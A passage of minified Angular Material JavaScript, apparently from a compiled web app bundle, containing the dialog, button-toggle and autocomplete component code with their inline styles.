1)",zi({transform:"none",opacity:1})),c4("@*",s4(),{optional:!0})]),B1),gn("* => void, * => exit",$P([En("{{exitAnimationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)",zi({opacity:0})),c4("@*",s4(),{optional:!0})]),B1)])};class rA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.maxWidth="80vw",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.delayFocusTrap=!0,this.closeOnNavigation=!0,this.enterAnimationDuration=B1.params.enterAnimationDuration,this.exitAnimationDuration=B1.params.exitAnimationDuration}}let r2e=(()=>{class t extends lV{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k),this._animationStateChanged=new Tt}_captureInitialFocus(){this._config.delayFocusTrap||this._trapFocus()}_openAnimationDone(e){this._config.delayFocusTrap&&this._trapFocus(),this._animationStateChanged.next({state:"opened",totalTime:e})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],features:[ci],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),s2e=(()=>{class t extends r2e{constructor(e,i,n,r,c,d,T,k,q){super(e,i,n,r,c,d,T,q),this._changeDetectorRef=k,this._state="enter"}_onAnimationDone({toState:e,totalTime:i}){"enter"===e?this._openAnimationDone(i):"exit"===e&&this._animationStateChanged.next({state:"closed",totalTime:i})}_onAnimationStart({toState:e,totalTime:i}){"enter"===e?this._animationStateChanged.next({state:"opening",totalTime:i}):("exit"===e||"void"===e)&&this._animationStateChanged.next({state:"closing",totalTime:i})}_startExitAnimation(){this._state="exit",this._changeDetectorRef.markForCheck()}_getAnimationState(){return{value:this._state,params:{enterAnimationDuration:this._config.enterAnimationDuration||B1.params.enterAnimationDuration,exitAnimationDuration:this._config.exitAnimationDuration||B1.params.exitAnimationDuration}}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(Ma),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["mat-dialog-container"]],hostAttrs:["tabindex","-1",1,"mat-dialog-container"],hostVars:7,hostBindings:function(e,i){1&e&&GC("@dialogContainer.start",function(r){return i._onAnimationStart(r)})("@dialogContainer.done",function(r){return i._onAnimationDone(r)}),2&e&&(Gs("id",i._config.id),Rt("aria-modal",i._config.ariaModal)("role",i._config.role)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null),s1("@dialogContainer",i._getAnimationState()))},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,n2e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".mat-dialog-container{display:block;padding:24px;border-radius:4px;box-sizing:border-box;overflow:auto;outline:0;width:100%;height:100%;min-height:inherit;max-height:inherit}.cdk-high-contrast-active .mat-dialog-container{outline:solid 1px}.mat-dialog-content{display:block;margin:0 -24px;padding:0 24px;max-height:65vh;overflow:auto;-webkit-overflow-scrolling:touch}.mat-dialog-title{margin:0 0 20px;display:block}.mat-dialog-actions{padding:8px 0;display:flex;flex-wrap:wrap;min-height:52px;align-items:center;box-sizing:content-box;margin-bottom:-24px}.mat-dialog-actions.mat-dialog-actions-align-center,.mat-dialog-actions[align=center]{justify-content:center}.mat-dialog-actions.mat-dialog-actions-align-end,.mat-dialog-actions[align=end]{justify-content:flex-end}.mat-dialog-actions .mat-button-base+.mat-button-base,.mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:8px}[dir=rtl] .mat-dialog-actions .mat-button-base+.mat-button-base,[dir=rtl] .mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:0;margin-right:8px}"],encapsulation:2,data:{animation:[o2e.dialogContainer]}}),t})();class Gh{constructor(a,e,i){this._ref=a,this._containerInstance=i,this._afterOpened=new J,this._beforeClosed=new J,this._state=0,this.disableClose=e.disableClose,this.id=a.id,i._animationStateChanged.pipe(Dn(n=>"opened"===n.state),Cn(1)).subscribe(()=>{this._afterOpened.next(),this._afterOpened.complete()}),i._animationStateChanged.pipe(Dn(n=>"closed"===n.state),Cn(1)).subscribe(()=>{clearTimeout(this._closeFallbackTimeout),this._finishDialogClose()}),a.overlayRef.detachments().subscribe(()=>{this._beforeClosed.next(this._result),this._beforeClosed.complete(),this._finishDialogClose()}),ra(this.backdropClick(),this.keydownEvents().pipe(Dn(n=>27===n.keyCode&&!this.disableClose&&!Zr(n)))).subscribe(n=>{this.disableClose||(n.preventDefault(),uV(this,"keydown"===n.type?"keyboard":"mouse"))})}close(a){this._result=a,this._containerInstance._animationStateChanged.pipe(Dn(e=>"closing"===e.state),Cn(1)).subscribe(e=>{this._beforeClosed.next(a),this._beforeClosed.complete(),this._ref.overlayRef.detachBackdrop(),this._closeFallbackTimeout=setTimeout(()=>this._finishDialogClose(),e.totalTime+100)}),this._state=1,this._containerInstance._startExitAnimation()}afterOpened(){return this._afterOpened}afterClosed(){return this._ref.closed}beforeClosed(){return this._beforeClosed}backdropClick(){return this._ref.backdropClick}keydownEvents(){return this._ref.keydownEvents}updatePosition(a){let e=this._ref.config.positionStrategy;return a&&(a.left||a.right)?a.left?e.left(a.left):e.right(a.right):e.centerHorizontally(),a&&(a.top||a.bottom)?a.top?e.top(a.top):e.bottom(a.bottom):e.centerVertically(),this._ref.updatePosition(),this}updateSize(a="",e=""){return this._ref.updateSize(a,e),this}addPanelClass(a){return this._ref.addPanelClass(a),this}removePanelClass(a){return this._ref.removePanelClass(a),this}getState(){return this._state}_finishDialogClose(){this._state=2,this._ref.close(this._result,{focusOrigin:this._closeInteractionType}),this.componentInstance=null}}function uV(t,a,e){return t._closeInteractionType=a,t.close(e)}const gp=new ni("MatDialogData"),c2e=new ni("mat-dialog-default-options"),hV=new ni("mat-dialog-scroll-strategy"),d2e={provide:hV,deps:[vs],useFactory:function l2e(t){return()=>t.scrollStrategies.block()}};let m2e=0,u2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y){this._overlay=e,this._defaultOptions=n,this._parentDialog=r,this._dialogRefConstructor=T,this._dialogContainerType=k,this._dialogDataToken=q,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._idPrefix="mat-dialog-",this.afterAllClosed=sp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d,this._dialog=i.get(mV)}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}open(e,i){let n;(i=Object.assign(Object.assign({},this._defaultOptions||new rA),i)).id=i.id||`${this._idPrefix}${m2e++}`,i.scrollStrategy=i.scrollStrategy||this._scrollStrategy();const r=this._dialog.open(e,Object.assign(Object.assign({},i),{positionStrategy:this._overlay.position().global().centerHorizontally().centerVertically(),disableClose:!0,closeOnDestroy:!1,container:{type:this._dialogContainerType,providers:()=>[{provide:rA,useValue:i},{provide:oA,useValue:i}]},templateContext:()=>({dialogRef:n}),providers:(c,d,T)=>(n=new this._dialogRefConstructor(c,i,T),n.updatePosition(null==i?void 0:i.position),[{provide:this._dialogContainerType,useValue:T},{provide:this._dialogDataToken,useValue:d.data},{provide:this._dialogRefConstructor,useValue:n}])}));return n.componentInstance=r.componentInstance,this.openDialogs.push(n),this.afterOpened.next(n),n.afterClosed().subscribe(()=>{const c=this.openDialogs.indexOf(n);c>-1&&(this.openDialogs.splice(c,1),this.openDialogs.length||this._getAfterAllClosed().next())}),n}closeAll(){this._closeDialogs(this.openDialogs)}getDialogById(e){return this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){this._closeDialogs(this._openDialogsAtThisLevel),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete()}_closeDialogs(e){let i=e.length;for(;i--;)e[i].close()}}return t.\u0275fac=function(e){pd()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),vu=(()=>{class t extends u2e{constructor(e,i,n,r,c,d,T,k){super(e,i,r,d,T,c,Gh,s2e,gp,k)}}return t.\u0275fac=function(e){return new(e||t)(At(vs),At(Ko),At(iy,8),At(c2e,8),At(hV),At(t,12),At(ob),At(ir,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),h2e=0,vm=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this._elementRef=i,this._dialog=n,this.type="button"}ngOnInit(){this.dialogRef||(this.dialogRef=fV(this._elementRef,this._dialog.openDialogs))}ngOnChanges(e){const i=e._matDialogClose||e._matDialogCloseResult;i&&(this.dialogResult=i.currentValue)}_onButtonClick(e){uV(this.dialogRef,0===e.screenX&&0===e.screenY?"keyboard":"mouse",this.dialogResult)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-close",""],["","matDialogClose",""]],hostVars:2,hostBindings:function(e,i){1&e&&he("click",function(r){return i._onButtonClick(r)}),2&e&&Rt("aria-label",i.ariaLabel||null)("type",i.type)},inputs:{ariaLabel:["aria-label","ariaLabel"],type:"type",dialogResult:["mat-dialog-close","dialogResult"],_matDialogClose:["matDialogClose","_matDialogClose"]},exportAs:["matDialogClose"],features:[sa]}),t})(),Am=(()=>{class t{constructor(e,i,n){this._dialogRef=e,this._elementRef=i,this._dialog=n,this.id="mat-dialog-title-"+h2e++}ngOnInit(){this._dialogRef||(this._dialogRef=fV(this._elementRef,this._dialog.openDialogs)),this._dialogRef&&Promise.resolve().then(()=>{const e=this._dialogRef._containerInstance;e&&!e._ariaLabelledBy&&(e._ariaLabelledBy=this.id)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-title",""],["","matDialogTitle",""]],hostAttrs:[1,"mat-dialog-title"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("id",i.id)},inputs:{id:"id"},exportAs:["matDialogTitle"]}),t})(),Tm=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-content",""],["mat-dialog-content"],["","matDialogContent",""]],hostAttrs:[1,"mat-dialog-content"]}),t})(),Em=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-actions",""],["mat-dialog-actions"],["","matDialogActions",""]],hostAttrs:[1,"mat-dialog-actions"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-dialog-actions-align-center","center"===i.align)("mat-dialog-actions-align-end","end"===i.align)},inputs:{align:"align"}}),t})();function fV(t,a){let e=t.nativeElement.parentElement;for(;e&&!e.classList.contains("mat-dialog-container");)e=e.parentElement;return e?a.find(i=>i.id===e.id):null}let y8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[vu,d2e],imports:[a2e,bu,yu,la,la]}),t})();const f2e=["button"],p2e=["*"],pV=new ni("MAT_BUTTON_TOGGLE_DEFAULT_OPTIONS"),_V=new ni("MatButtonToggleGroup"),_2e={provide:Ls,useExisting:ja(()=>b8),multi:!0};let gV=0;class CV{constructor(a,e){this.source=a,this.value=e}}let b8=(()=>{class t{constructor(e,i){this._changeDetector=e,this._vertical=!1,this._multiple=!1,this._disabled=!1,this._controlValueAccessorChangeFn=()=>{},this._onTouched=()=>{},this._name="mat-button-toggle-group-"+gV++,this.valueChange=new Tt,this.change=new Tt,this.appearance=i&&i.appearance?i.appearance:"standard"}get name(){return this._name}set name(e){this._name=e,this._markButtonsForCheck()}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get value(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e.map(i=>i.value):e[0]?e[0].value:void 0}set value(e){this._setSelectionByValue(e),this.valueChange.emit(this.value)}get selected(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e:e[0]||null}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._markButtonsForCheck()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markButtonsForCheck()}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1)}ngAfterContentInit(){this._selectionModel.select(...this._buttonToggles.filter(e=>e.checked))}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_emitChangeEvent(e){const i=new CV(e,this.value);this._controlValueAccessorChangeFn(i.value),this.change.emit(i)}_syncButtonToggle(e,i,n=!1,r=!1){!this.multiple&&this.selected&&!e.checked&&(this.selected.checked=!1),this._selectionModel?i?this._selectionModel.select(e):this._selectionModel.deselect(e):r=!0,r?Promise.resolve().then(()=>this._updateModelValue(e,n)):this._updateModelValue(e,n)}_isSelected(e){return this._selectionModel&&this._selectionModel.isSelected(e)}_isPrechecked(e){return void 0!==this._rawValue&&(this.multiple&&Array.isArray(this._rawValue)?this._rawValue.some(i=>null!=e.value&&i===e.value):e.value===this._rawValue)}_setSelectionByValue(e){this._rawValue=e,this._buttonToggles&&(this.multiple&&e?(Array.isArray(e),this._clearSelection(),e.forEach(i=>this._selectValue(i))):(this._clearSelection(),this._selectValue(e)))}_clearSelection(){this._selectionModel.clear(),this._buttonToggles.forEach(e=>e.checked=!1)}_selectValue(e){const i=this._buttonToggles.find(n=>null!=n.value&&n.value===e);i&&(i.checked=!0,this._selectionModel.select(i))}_updateModelValue(e,i){i&&this._emitChangeEvent(e),this.valueChange.emit(this.value)}_markButtonsForCheck(){var e;null===(e=this._buttonToggles)||void 0===e||e.forEach(i=>i._markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(pV,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-button-toggle-group"]],contentQueries:function(e,i,n){if(1&e&&ha(n,M8,5),2&e){let r;Vt(r=Bt())&&(i._buttonToggles=r)}},hostAttrs:["role","group",1,"mat-button-toggle-group"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",i.disabled),Ct("mat-button-toggle-vertical",i.vertical)("mat-button-toggle-group-appearance-standard","standard"===i.appearance))},inputs:{appearance:"appearance",name:"name",vertical:"vertical",value:"value",multiple:"multiple",disabled:"disabled"},outputs:{valueChange:"valueChange",change:"change"},exportAs:["matButtonToggleGroup"],features:[ki([_2e,{provide:_V,useExisting:t}])]}),t})();const g2e=Dl(class{});let M8=(()=>{class t extends g2e{constructor(e,i,n,r,c,d){super(),this._changeDetectorRef=i,this._elementRef=n,this._focusMonitor=r,this._checked=!1,this.ariaLabelledby=null,this._disabled=!1,this.change=new Tt;const T=Number(c);this.tabIndex=T||0===T?T:null,this.buttonToggleGroup=e,this.appearance=d&&d.appearance?d.appearance:"standard"}get buttonId(){return`${this.id}-button`}get appearance(){return this.buttonToggleGroup?this.buttonToggleGroup.appearance:this._appearance}set appearance(e){this._appearance=e}get checked(){return this.buttonToggleGroup?this.buttonToggleGroup._isSelected(this):this._checked}set checked(e){const i=wi(e);i!==this._checked&&(this._checked=i,this.buttonToggleGroup&&this.buttonToggleGroup._syncButtonToggle(this,this._checked),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled||this.buttonToggleGroup&&this.buttonToggleGroup.disabled}set disabled(e){this._disabled=wi(e)}ngOnInit(){const e=this.buttonToggleGroup;this.id=this.id||"mat-button-toggle-"+gV++,e&&(e._isPrechecked(this)?this.checked=!0:e._isSelected(this)!==this._checked&&e._syncButtonToggle(this,this._checked))}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){const e=this.buttonToggleGroup;this._focusMonitor.stopMonitoring(this._elementRef),e&&e._isSelected(this)&&e._syncButtonToggle(this,!1,!1,!0)}focus(e){this._buttonElement.nativeElement.focus(e)}_onButtonClick(){const e=!!this._isSingleSelector()||!this._checked;e!==this._checked&&(this._checked=e,this.buttonToggleGroup&&(this.buttonToggleGroup._syncButtonToggle(this,this._checked,!0),this.buttonToggleGroup._onTouched())),this.change.emit(new CV(this,this.value))}_markForCheck(){this._changeDetectorRef.markForCheck()}_getButtonName(){return this._isSingleSelector()?this.buttonToggleGroup.name:this.name||null}_isSingleSelector(){return this.buttonToggleGroup&&!this.buttonToggleGroup.multiple}}return t.\u0275fac=function(e){return new(e||t)(Ee(_V,8),Ee(Ma),Ee(mi),Ee(js),Vr("tabindex"),Ee(pV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-button-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(f2e,5),2&e){let n;Vt(n=Bt())&&(i._buttonElement=n.first)}},hostAttrs:["role","presentation",1,"mat-button-toggle"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()}),2&e&&(Rt("aria-label",null)("aria-labelledby",null)("id",i.id)("name",null),Ct("mat-button-toggle-standalone",!i.buttonToggleGroup)("mat-button-toggle-checked",i.checked)("mat-button-toggle-disabled",i.disabled)("mat-button-toggle-appearance-standard","standard"===i.appearance))},inputs:{disableRipple:"disableRipple",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],id:"id",name:"name",value:"value",tabIndex:"tabIndex",appearance:"appearance",checked:"checked",disabled:"disabled"},outputs:{change:"change"},exportAs:["matButtonToggle"],features:[ci],ngContentSelectors:p2e,decls:6,vars:9,consts:[["type","button",1,"mat-button-toggle-button","mat-focus-indicator",3,"id","disabled","click"],["button",""],[1,"mat-button-toggle-label-content"],[1,"mat-button-toggle-focus-overlay"],["matRipple","",1,"mat-button-toggle-ripple",3,"matRippleTrigger","matRippleDisabled"]],template:function(e,i){if(1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._onButtonClick()}),m(2,"span",2),va(3),u()(),it(4,"span",3)(5,"span",4)),2&e){const n=Ti(1);V("id",i.buttonId)("disabled",i.disabled||null),Rt("tabindex",i.disabled?-1:i.tabIndex)("aria-pressed",i.checked)("name",i._getButtonName())("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby),C(5),V("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)}},dependencies:[xl],styles:[".mat-button-toggle-standalone,.mat-button-toggle-group{position:relative;display:inline-flex;flex-direction:row;white-space:nowrap;overflow:hidden;border-radius:2px;-webkit-tap-highlight-color:rgba(0,0,0,0);transform:translateZ(0)}.cdk-high-contrast-active .mat-button-toggle-standalone,.cdk-high-contrast-active .mat-button-toggle-group{outline:solid 1px}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.mat-button-toggle-group-appearance-standard{border-radius:4px}.cdk-high-contrast-active .mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.cdk-high-contrast-active .mat-button-toggle-group-appearance-standard{outline:0}.mat-button-toggle-vertical{flex-direction:column}.mat-button-toggle-vertical .mat-button-toggle-label-content{display:block}.mat-button-toggle{white-space:nowrap;position:relative}.mat-button-toggle .mat-icon svg{vertical-align:top}.mat-button-toggle.cdk-keyboard-focused .mat-button-toggle-focus-overlay{opacity:1}.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{opacity:.04}.mat-button-toggle-appearance-standard.cdk-keyboard-focused:not(.mat-button-toggle-disabled) .mat-button-toggle-focus-overlay{opacity:.12}@media(hover: none){.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{display:none}}.mat-button-toggle-label-content{-webkit-user-select:none;user-select:none;display:inline-block;line-height:36px;padding:0 16px;position:relative}.mat-button-toggle-appearance-standard .mat-button-toggle-label-content{padding:0 12px}.mat-button-toggle-label-content>*{vertical-align:middle}.mat-button-toggle-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;pointer-events:none;opacity:0}.cdk-high-contrast-active .mat-button-toggle-checked .mat-button-toggle-focus-overlay{border-bottom:solid 36px;opacity:.5;height:0}.cdk-high-contrast-active .mat-button-toggle-checked:hover .mat-button-toggle-focus-overlay{opacity:.6}.cdk-high-contrast-active .mat-button-toggle-checked.mat-button-toggle-appearance-standard .mat-button-toggle-focus-overlay{border-bottom:solid 500px}.mat-button-toggle .mat-button-toggle-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-button-toggle-button{border:0;background:none;color:inherit;padding:0;margin:0;font:inherit;outline:none;width:100%;cursor:pointer}.mat-button-toggle-disabled .mat-button-toggle-button{cursor:default}.mat-button-toggle-button::-moz-focus-inner{border:0}"],encapsulation:2,changeDetection:0}),t})(),yV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,Pd,la]}),t})();const C2e=["panel"];function y2e(t,a){if(1&t&&(m(0,"div",0,1),va(2),u()),2&t){const e=a.id,i=B();V("id",i.id)("ngClass",i._classList),Rt("aria-label",i.ariaLabel||null)("aria-labelledby",i._getPanelAriaLabelledby(e))}}const b2e=["*"];let M2e=0;class v2e{constructor(a,e){this.source=a,this.option=e}}const A2e=Dl(class{}),bV=new ni("mat-autocomplete-default-options",{providedIn:"root",factory:function T2e(){return{autoActiveFirstOption:!1,autoSelectActiveOption:!1}}});let E2e=(()=>{class t extends A2e{constructor(e,i,n,r){super(),this._changeDetectorRef=e,this._elementRef=i,this._activeOptionChanges=I.EMPTY,this.showPanel=!1,this._isOpen=!1,this.displayWith=null,this.optionSelected=new Tt,this.opened=new Tt,this.closed=new Tt,this.optionActivated=new Tt,this._classList={},this.id="mat-autocomplete-"+M2e++,this.inertGroups=(null==r?void 0:r.SAFARI)||!1,this._autoActiveFirstOption=!!n.autoActiveFirstOption,this._autoSelectActiveOption=!!n.autoSelectActiveOption}get isOpen(){return this._isOpen&&this.showPanel}get autoActiveFirstOption(){return this._autoActiveFirstOption}set autoActiveFirstOption(e){this._autoActiveFirstOption=wi(e)}get autoSelectActiveOption(){return this._autoSelectActiveOption}set autoSelectActiveOption(e){this._autoSelectActiveOption=wi(e)}set classList(e){this._classList=e&&e.length?function Lhe(t,a=/\s+/){const e=[];if(null!=t){const i=Array.isArray(t)?t:`${t}`.split(a);for(const n of i){const r=`${n}`.trim();r&&e.push(r)}}return e}(e).reduce((i,n)=>(i[n]=!0,i),{}):{},this._setVisibilityClasses(this._classList),this._elementRef.nativeElement.className=""}ngAfterContentInit(){this._keyManager=new Bz(this.options).withWrap(),this._activeOptionChanges=this._keyManager.change.subscribe(e=>{this.isOpen&&this.optionActivated.emit({source:this,option:this.options.toArray()[e]||null})}),this._setVisibility()}ngOnDestroy(){this._activeOptionChanges.unsubscribe()}_setScrollTop(e){this.panel&&(this.panel.nativeElement.scrollTop=e)}_getScrollTop(){return this.panel?this.panel.nativeElement.scrollTop:0}_setVisibility(){this.showPanel=!!this.options.length,this._setVisibilityClasses(this._classList),this._changeDetectorRef.markForCheck()}_emitSelectEvent(e){const i=new v2e(this,e);this.optionSelected.emit(i)}_getPanelAriaLabelledby(e){return this.ariaLabel?null:this.ariaLabelledby?(e?e+" ":"")+this.ariaLabelledby:e}_setVisibilityClasses(e){e[this._visibleClass]=this.showPanel,e[this._hiddenClass]=!this.showPanel}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(mi),Ee(bV),Ee(sr))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(ho,7),Mi(C2e,5)),2&e){let n;Vt(n=Bt())&&(i.template=n.first),Vt(n=Bt())&&(i.panel=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],displayWith:"displayWith",autoActiveFirstOption:"autoActiveFirstOption",autoSelectActiveOption:"autoSelectActiveOption",panelWidth:"panelWidth",classList:["class","classList"]},outputs:{optionSelected:"optionSelected",opened:"opened",closed:"closed",optionActivated:"optionActivated"},features:[ci]}),t})(),D2e=(()=>{class t extends E2e{constructor(){super(...arguments),this._visibleClass="mat-autocomplete-visible",this._hiddenClass="mat-autocomplete-hidden"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-autocomplete"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,j3,5),ha(n,yr,5)),2&e){let r;Vt(r=Bt())&&(i.optionGroups=r),Vt(r=Bt())&&(i.options=r)}},hostAttrs:[1,"mat-autocomplete"],inputs:{disableRipple:"disableRipple"},exportAs:["matAutocomplete"],features:[ki([{provide:G3,useExisting:t}]),ci],ngContentSelectors:b2e,decls:1,vars:0,consts:[["role","listbox",1,"mat-autocomplete-panel",3,"id","ngClass"],["panel",""]],template:function(e,i){1&e&&(Jn(),ne(0,y2e,3,4,"ng-template"))},dependencies:[ag],styles:[".mat-autocomplete-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;visibility:hidden;max-width:none;max-height:256px;position:relative;width:100%;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.mat-autocomplete-panel.mat-autocomplete-visible{visibility:visible}.mat-autocomplete-panel.mat-autocomplete-hidden{visibility:hidden}.mat-autocomplete-panel-above .mat-autocomplete-panel{border-radius:0;border-top-left-radius:4px;border-top-right-radius:4px}.mat-autocomplete-panel .mat-divider-horizontal{margin-top:-1px}.cdk-high-contrast-active .mat-autocomplete-panel{outline:solid 1px}mat-autocomplete{display:none}"],encapsulation:2,changeDetection:0}),t})();const MV=new ni("mat-autocomplete-scroll-strategy"),w2e={provide:MV,deps:[vs],useFactory:function x2e(t){return()=>t.scrollStrategies.reposition()}},I2e={provide:Ls,useExisting:ja(()=>vV),multi:!0};let R2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this._element=e,this._overlay=i,this._viewContainerRef=n,this._zone=r,this._changeDetectorRef=c,this._dir=T,this._formField=k,this._document=q,this._viewportRuler=Y,this._defaults=te,this._componentDestroyed=!1,this._autocompleteDisabled=!1,this._manuallyFloatingLabel=!1,this._viewportSubscription=I.EMPTY,this._canOpenOnNextFocus=!0,this._closeKeyEventStream=new J,this._windowBlurHandler=()=>{this._canOpenOnNextFocus=this._document.activeElement!==this._element.nativeElement||this.panelOpen},this._onChange=()=>{},this._onTouched=()=>{},this.position="auto",this.autocompleteAttribute="off",this._overlayAttached=!1,this.optionSelections=sp(()=>{const pe=this.autocomplete?this.autocomplete.options:null;return pe?pe.changes.pipe(Ro(pe),Ur(()=>ra(...pe.map(Re=>Re.onSelectionChange)))):this._zone.onStable.pipe(Cn(1),Ur(()=>this.optionSelections))}),this._scrollStrategy=d}get autocompleteDisabled(){return this._autocompleteDisabled}set autocompleteDisabled(e){this._autocompleteDisabled=wi(e)}ngAfterViewInit(){const e=this._getWindow();void 0!==e&&this._zone.runOutsideAngular(()=>e.addEventListener("blur",this._windowBlurHandler))}ngOnChanges(e){e.position&&this._positionStrategy&&(this._setStrategyPositions(this._positionStrategy),this.panelOpen&&this._overlayRef.updatePosition())}ngOnDestroy(){const e=this._getWindow();void 0!==e&&e.removeEventListener("blur",this._windowBlurHandler),this._viewportSubscription.unsubscribe(),this._componentDestroyed=!0,this._destroyPanel(),this._closeKeyEventStream.complete()}get panelOpen(){return this._overlayAttached&&this.autocomplete.showPanel}openPanel(){this._attachOverlay(),this._floatLabel()}closePanel(){this._resetLabel(),this._overlayAttached&&(this.panelOpen&&this._zone.run(()=>{this.autocomplete.closed.emit()}),this.autocomplete._isOpen=this._overlayAttached=!1,this._pendingAutoselectedOption=null,this._overlayRef&&this._overlayRef.hasAttached()&&(this._overlayRef.detach(),this._closingActionsSubscription.unsubscribe()),this._componentDestroyed||this._changeDetectorRef.detectChanges())}updatePosition(){this._overlayAttached&&this._overlayRef.updatePosition()}get panelClosingActions(){return ra(this.optionSelections,this.autocomplete._keyManager.tabOut.pipe(Dn(()=>this._overlayAttached)),this._closeKeyEventStream,this._getOutsideClickStream(),this._overlayRef?this._overlayRef.detachments().pipe(Dn(()=>this._overlayAttached)):Bi()).pipe(Xe(e=>e instanceof IW?e:null))}get activeOption(){return this.autocomplete&&this.autocomplete._keyManager?this.autocomplete._keyManager.activeItem:null}_getOutsideClickStream(){return ra(Tc(this._document,"click"),Tc(this._document,"auxclick"),Tc(this._document,"touchend")).pipe(Dn(e=>{const i=wd(e),n=this._formField?this._formField._elementRef.nativeElement:null,r=this.connectedTo?this.connectedTo.elementRef.nativeElement:null;return this._overlayAttached&&i!==this._element.nativeElement&&this._document.activeElement!==this._element.nativeElement&&(!n||!n.contains(i))&&(!r||!r.contains(i))&&!!this._overlayRef&&!this._overlayRef.overlayElement.contains(i)}))}writeValue(e){Promise.resolve(null).then(()=>this._assignOptionValue(e))}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this._element.nativeElement.disabled=e}_handleKeydown(e){const 